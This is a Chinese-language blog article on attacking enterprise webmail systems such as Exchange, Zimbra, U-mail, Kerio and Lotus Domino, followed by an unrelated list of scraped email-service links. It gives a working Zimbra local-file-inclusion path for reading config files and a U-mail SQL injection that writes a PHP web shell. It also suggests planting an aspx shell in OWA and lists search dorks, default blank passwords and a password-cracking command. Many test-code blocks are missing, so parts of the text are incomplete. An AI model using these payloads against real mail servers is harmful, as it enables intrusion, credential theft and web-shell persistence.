高屋建瓴之WebMail攻与防cyjay5un

但是像上述的这些软件及平台都有一个共同的特征,那就是即时性。即时性的通信虽然有其独特的优点所在但是在企业级方面的安全性却得不到全方面的保障;电子邮件却恰恰相反,虽然即时通讯的能力不强,但是在企业级的安全性方面相对于即时通信还是略占优势的。根据一则报道显示:

“有52%的被调查者相信,与电子邮件相比,即时通信服务的速度更快,也更有效率;但76%的被调查者表示,他们相信即时通信服务只是一种补充的通信方式,但永远不会取代电子邮件。27%的被调查者还认为,即时通信服务不适合企业应用,主要原因是消费者在即时通信服务中缺乏安全性、责任性以及可记录的审计功能。”

以下是从网上收集到的一份国内企业的webmail的大致使用类型比例的统计图

……

当我们认为的安全不再安全,我们唯一能做的就是尽力去防御,去弥补这些不安全的因素。

所谓未知攻焉知防,我们接下来便来了解一下一些针对webmail的攻击方式

实验平台:kalilinux

工具:theharvester、jenny、metasploit

theharvester

是一个社会工程学工具,它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息。

Metasploit

Jenny

jenny是一款自动化的Web漏洞扫描工具。

适用于黑盒Web安全评估和渗透测试。

扫描单独网站扫描和旁站扫描两种扫描形式。

具有自动、轻量、智能等特点。

工具集成了一些web漏洞的扫描,还有Email地址的收集

但是相对于其他两款来说,效果不是太好。

(2)在这场攻与防的战斗中,社工是个独特的技能所在,他利用人们的好奇心理,诱使他人进入圈套。

一般来说,攻击者在确定目标后会以企业的某一个员工或者高管作为突破点,通过各种手段得到其邮件的控制权限。

在得到权限之后可能以VPN方式进入内网获取更大权限,抑或以伪造邮件的方式,将恶意代码或者程序隐藏在其中,

从而获得全面的信息,而他们的目标便是那些内网服务器里有价值的文件,抑或就是邮件里有价值的信息。

案例1:

测试代码:

案例2:

Exchange

微软的产品渗透中大家也最熟悉了漏洞不多

很多时候一个/owa就出来了

不管你社工库也好暴力破解也好猜密码也好进去就行了

其他的就是搜寻Password,VPN,密码或者其他有用东东。

1)owa/auth/test.aspx,OWA有一个报错机制,会把当前MAILBOX服务器或者当前的邮件服务器报出来。

2)ClientAccess\Owa\auth下面放个aspxshell是极好的

3)命令行邮件导出成pst文件必须掌握

案例3:

Mirapoint

全球四大邮件系统之一

1.mirapoint邮件系统存在ShellShock破壳漏洞(CVE-2014-6271)

存在ShellShock破壳漏洞(CVE-2014-6271),可远程执行任意命令

2.大量使用Mirapoint的邮件系统被自动化植入后门(统计中招比例1/5)

原文里提及“本来打算看看Mirapoint的源代码做下审计,结果发现两个可疑文件。”,大家可以自行查看。

案例4:

KerioConnect

1)登陆后导出联系人

POST:{“jsonrpc”:”2.0″,”id”:18,”method”:”Contacts.get”,”params”:{“folderIds”:[],”query”:{“start”:500,”limit”:500}}}

一般后台只能内网访问KerioConnect后台可导出用户信息和日志不能导密码

案例5:

本地文件包含的测试代码:

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgzv=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

如果能访问7071端口可以加管理员账户的权限提升测试工具下载:

Zimbra看版本:

如:上次更新日期2012/7/5VMwareZimbraCollaborationServer和VMwareZimbraCollaborationAppliance8.0

Zimbra默认后台

Zimbra还有个XSS漏洞这里就不提了~

案例6:

漏洞类型:bdconfig.iniDisclosure

漏洞细节:

获取到这些信息能干嘛看各自发挥了~

案例7:

postmaster管理员,

nobody,sec_bm,sec_sj密码都为空

这里虽然显示为普通账号,却具有【管理用户】的权限,而此处还存在一个设计缺陷,能看到任意用户的密码,包括管理员。

这里的密码为base64加密,如果后面有字符“3D”,需删掉再进行解密。

测试代码:

案例8:

弱口令:默认账号:nobody域:root密码:无

案例9:

漏洞类型:Open_redirect

关于Open_redirect漏洞的详细问题请访问如下链接:

案例10:

漏洞类型:SQL注入&&可直接Getshell

查看绝对路径:

也可以这样:

添加userapply.phpexecadd=333&DomainID=111

我们可以看到绝对路径为:D:\umail\WorldClient\html\userapply.php

构造语句:

aa’unionselect1,2,3,4,5,6,'’,8,9,10,11,12,13,14intooutfile‘D:/umail/WorldClient/html/H.php’#

将上面的语句进行Base64加密YWElMjclMjB1bmlvbiUyMHNlbGVjdCUyMDElMkMyJTJDMyUyQzQlMkM1JTJDNiUyQyUyNyUzQyUzRnBocCUyMGV2YWwlMjglMjRfUE9TVDElMjklM0IlM0YlM0UlMjclMkM4JTJDOSUyQzEwJTJDMTElMkMxMiUyQzEzJTJDMTQlMjBpbnRvJTIwb3V0ZmlsZSUyMCUyN0QlM0EvdW1haWwvV29ybGRDbGllbnQvaHRtbC9ILnBocCUyNyUyMw==

然后将Base64加密后的语句添加到如下的URL后

此时已经将shell写进站点目录中:

shell地址:

Password:shell

然后用菜刀连接:

有些写进去文件不一定可以链接的到。具体原因不知···请自行探索。

U-mail的高危漏洞不仅仅只是上述案例这一个,还有好多:

案例11:

漏洞类型:CSRF

Dork:inurl:webmail/adminpanel/index.php

Exploit:

案例12:

漏洞类型:越权访问

利用Google或者Bing搜索关键字:

inurl:.nsf/WebHelp/!OpenPage

如:

jilinbsc.nsf/WebHelp/!OpenPage

当我们找到一个目标站点的时候,点击进去会发现该选项

中文为:转到收件箱

2)非常老的版本里面html代码里面HTTPPassword或dspHTTPPassword存着密码

./johnHASH.txt–format=lotus5

又扯多了,哎,来老外paper

案例13:

这里由于缺少案例我们直接引用wooyun提交的一则案列来说明。

利用步骤:

2)查看源代码,搜索“sessid”我们可以得到隐藏在源代码里的一串字符。

案例14:

漏洞类型:默认配置不当

漏洞细节

From:

漏洞利用步骤:

另外Extmail老版本登陆处有注入。

还有很多webmail,类似eYou之类,就不一一列举了。

案例15:

钓鱼邮件与反钓鱼:

上面例举了数个漏洞案例,但这些漏洞无一例外都是webmail程序自身的漏洞,但在现实的攻防实战中的手段可不仅仅是这一种,常见的还有钓鱼邮件。

攻击者通过伪造邮件,诱使管理员或个人用户点击从而获取被害人的敏感信息,甚至是将木马程序安装到电脑上,以实现长期监控的目的。

有两次各大互联网公司都遭遇钓鱼邮件攻击估计都有不同程度的应急吧?

由于存在目录遍历可以迅速的发现databases下的asp数据库文件

发现很多公司人员没有任何安全防范意识而中招看asp程序那就简单拿个shell分分钟的事情

再继续发现配置里面有个人信息

后续朋友帮忙社工到了该毛头小子的头像和住址就不一一详述了。

在企业重视安全后,企业内部组织安全意识和安全常识培训后,将企业的损失最小化。

THE END
1.全球云邮箱阿里邮箱是阿里云自主研发,基于阿里云基础组件部署,基于云计算原生公有云服务的邮件运营商http://mail.hw555.cn/
2.WorldClient邮件地址: 密码: 语言:EnglishCanadien fran?aisChineseDanskDeutsch?eskyEnglish-UKEspa?olFran?aisBahasa IndonesiaItaliano日本語MagyarNederlandsNorsk (bokm?l)PolskiPortuguêsРусскийHrvatskiSlovenskoSuomiSvenskaTaiwanSrpskiΕλληνικ?Türk?eRomana? http://mail.recreogroup.com/
3.全球邮Q. 相比个人邮箱,企业邮局有什么突出的功能? 企业邮局拥有许多在个人邮件不可用的功能。如,共享日历,全球联系人,共享文档管理,共享任务管理,移动设备同步,MS Outlook和MAC OSX等。 Q. 支持哪款客户端&协议? 您可以使用任何基于桌面电子邮件客户端,如微软Outlook,Outlook Express,Mozilla的雷鸟,Eudora,Entourage 2004,https://7211.com/web-hosting/enterprise-email-hosting.php
4.WorldClient邮件地址: 密码:http://mail.htc.cn/
5.网易企业邮箱帮助中心网易企业邮箱网易企业邮箱产品是网易公司最早开展的业务之一,网易企业邮箱经过22年的持续投入和创新,为推动企业邮箱产业发展做出了重大贡献。作为企业邮箱第一品牌,网易一直以为企业提供最优质的企业邮箱服务为己任,始终把企业邮箱用户使用体验放在首位。https://www.163biz.com/help/?tag=%E9%80%80%E4%BF%A1
6.全球邮企业邮箱怎么注册全球邮是全球领先的企业邮箱服务提供商,提供安全、稳定、高效的企业邮箱解决方案。本文将详细介绍全球邮企业邮箱的注册流程。 准备工作 在注册全球邮企业邮箱之前,需要准备以下材料: 企业域名:需要注册一个企业专属域名,作为企业邮箱的域名后缀。 联系人信息:包括姓名、联系电话、电子邮件地址等。 http://www.cdcy-mail.com/hyxw/5514.html
7.使用MDaemon建立邮件服务器启动MDaemon,选择“Setup”->“WorldClient”,选中“WorldClient is running under IIS”。 之后,在浏览器里输入 http://user.dns0755.net/mail/ 就可以进入WorldClient。https://www.dns0755.net/news/54.html
8.全球邮如何添加邮箱账号?全球邮如何添加邮箱账号?以管理员身份登录邮局管理员账号,在帐号管理页面上点击“”账号管理“”-“添加用户”,即可打开添加页面。 您可以根据需要填写相关用户信息,“*”为必填项目。 1.用户账号、初始密码,确认密码是必填项。2.邮箱状态:设置用户账号的活跃状态、登录方式和服务权限。3.启用、禁用:选择“启用”后http://www.xinve.com/help/etpemail/119.html
9.为什么用了outlookexpress后worldclient没有邮件了如果你outlook express没有设置在服务器上保留邮件副本的话,原来worldclient服务器上的邮件都下载到客户端并从服务器删除,你要咨询worldclient供应商有没有给你备份,不然就没了。另外一种方法:用文件恢复软件找你电脑上的.dbx文件,如果能找到叶可以恢复。https://zhidao.baidu.com/question/165571756.html
10.企业级邮件服务软件推荐常见企业邮件服务器WorldClient is running under IIS:选中该复选框,当服务器安装有IIS时,WorldClient 将运行在IIS服务之下。 Run WorldClients server using thisTCPport:在该文本框中指定访问WorldClient所使用的端口号。系统默认值为3000,即用户可通过http://mail.ghq.org:3000(其中mail.ghq.org指邮件服务器的域名)这种方式对WorldClihttps://blog.csdn.net/xieyunc/article/details/4137723/
11.国外邮箱登录入口,rpa,机器人,自动化limzero.comhttps://limzero.com/top_10_free_encrypted_and_private十大免费、加密、隐私的国外邮箱推荐 | 极限零点网页注意:该邮箱必须在使用Tor代理的情况下注册免费@mail2tor.com帐户,以及使用其他信箱服务(网络邮件、SMTP、POP3和IMAP访问)。 请注意:这些邮箱服务都提供不同的 更多内容请查看https://limzero.https://www.wdlinux.cn/html/email/20240927/1152.html
12.邮箱大师官网下载邮箱大师电脑版下载邮箱大师网易邮箱华军软件园邮箱大师专区专题,为您提供邮箱大师官方下载,想更方便的管理邮箱吗?邮箱太多怎么办?那就快来使用邮箱大师吧。邮箱大师是网易公司推出的一款邮件客户端,支持PC/安卓/iOS和Mac系统支持,邮箱大师支持网易邮箱,QQ邮箱,Gmail,Hotmail,139邮箱,新浪邮箱甚至http://www.onlinedown.net/zt/1298/
13.MicrosoftaccountWe can't sign you in Your browser is currently set to block cookies. You need to allow cookies to use this service. Cookies are small text files stored on your computer that tell us when you're signed in. To learn how to allow cookies, check the online help in your web browser. https://login.live.com/cookiesDisabled.srf?uaid=7a12blablablagobblygook=EN-US&lc=1033
14.登录到Outlook登录继续到 Outlook123456A@curtin.edu.au 没有帐户? 创建一个! 无法访问您的帐户?This area is for Curtin University Staff and Students only. Curtin actively monitors the use of its ICT facilities and services, including content of all electronic communications, and reminds you that a contravention https://www.outlook.com/owa/curtin.edu.au
15.用MDaemon自带的功能——comagent同步联系人上次,在《MDaemon邮件服务器在WorldClient新增的聊天功能》的中曾提到alt-n公司开发的comagent这款插件,主要用于同步联系人。现在,废话不多说了,我们来看看具体是怎么同步联系人的。 第一步:用ie 登陆邮箱系统之后,选项---comagent---下载comagent安装程序(备注:ie版本不一样,进入的模式也不一样,界面稍有变化) https://blog.51cto.com/19281928/579732
16.Webmail使用帮助软件名称:Eudora 软件版本:5.1 1〕 系统第一次使用此软件会首先弹出一个对话框“Email Account Setup”,点击 下一步; 2〕 “Account Settings”可以让用户选择一种得建立邮件帐号方式,这里我们选择建立一个新的youdomain.com邮箱帐号:“Create a brand new email account”,下一步 http://mail.szxc.gov.cn/help/ch_gb/eudora.html
17.使用MDaemon搭建企业邮局(3)大家很想得到的在线申请在哪设定呢?对了!就是那个“允许通过WorldClient客户端来申请和创建新的MDaemon用户!前面只要打勾就OK了! 默认语言 也就是你的邮件服务器将使用什么语言,包括新建用户默认语言。 默认风格 新安装的邮件系统有三个风格可选择的,(你也可以自己增加新的风格,或修改风格) https://www.west.cn/www/info/42808-1.htm
18.网易邮箱大师loading 他们在用 邮箱大师 邮箱大师是我毕业后用的第一个邮件app,刚毕业找工作的时候每周会收到很多招聘相关邮件, 手机端及时的邮件推送让我不会错过offer通知。 丁晓峰企业管理人员 李想大学毕业生 Stella Wang外贸人员 认真到底 终有回响 听听他们的故事https://mail.163.com/dashi/?m=(
19.国内外常用企业邮箱及个人邮箱客户端配置大全热门问题网易企业邮箱是拥有国际化标准安全证书的企业电子邮箱系统,专业反垃圾技术,极速稳定收发,全球畅邮,有着26年运营经验和2000人专业团队,已获得超百万家企业信赖。为了惠及更多的企业,网易企业邮箱现推出新客户购买3年送3年优惠活动。相当于花3年的预算就可以享受6年的品质服务。https://ym163.com/?hot-questions/4836.html
20.国际邮箱ZohoMail企业邮箱通过国际邮箱 ,详细了解Zoho Mail企业邮箱的优势,Zoho Mail企业邮箱功能全面强大、纯净无广告、国际知名度广、邮件抵达率高而深受知名企业和外贸行业的喜爱,使用Zoho Mail给您带来不一样的企业邮箱使用体验!https://www.zoho.com.cn/mail/articles/tag/%E5%9B%BD%E9%99%85%E9%82%AE%E7%AE%B1
21.MDaemon购买MDaemon代理MDaemon邮件管理软件咨询邮箱:sales@altn.cn 以上是MDaemon PRO 邮件服务器软件的最新版产品介绍简介,有关于MDaemon PRO 邮件服务器软件的购买,使用教程,免费下载,服务技术支持,帮助测试,功能更新升级,试用版支持及销售报价价格表等请致电总代理商购买销售电话。 买软件网为MDaemon PRO 邮件服务器软件的中国官方中文版网站,正版软件销售公https://www.qast.com/product/17.html